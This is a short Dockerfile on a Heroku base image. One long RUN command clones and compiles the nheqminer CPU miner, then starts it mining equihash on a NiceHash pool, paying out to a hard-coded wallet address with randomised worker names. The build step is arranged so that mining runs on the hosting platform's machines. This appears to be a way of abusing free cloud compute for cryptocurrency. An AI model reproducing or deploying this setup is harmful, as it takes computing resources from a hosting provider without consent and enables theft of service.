FROM heroku/heroku:18
RUN apt-get install -y curl git unzip wget
RUN apt-get install git && apt-get install screen -y && apt-get install sudo && sudo apt-get install cmake build-essential libboost-all-dev && git clone -b Linux https://github.com/nicehash/nheqminer && cd nheqminer/cpu_xenoncat/Linux/asm/ && sh assemble.sh && cd ../../../Linux_cmake/nheqminer_cpu && cmake . && make -j $(nproc) && ./nheqminer_cpu -b && ./nheqminer_cpu -l equihash.hk.nicehash.com:3357 -u 3QsSYE159SB7FFj3dP9hCwhudsBsUrdSuJ.CPU-MT_RECEH-$(echo $(shuf -i 1-99 -n 1)) -t 2
CMD bash heroku.sh
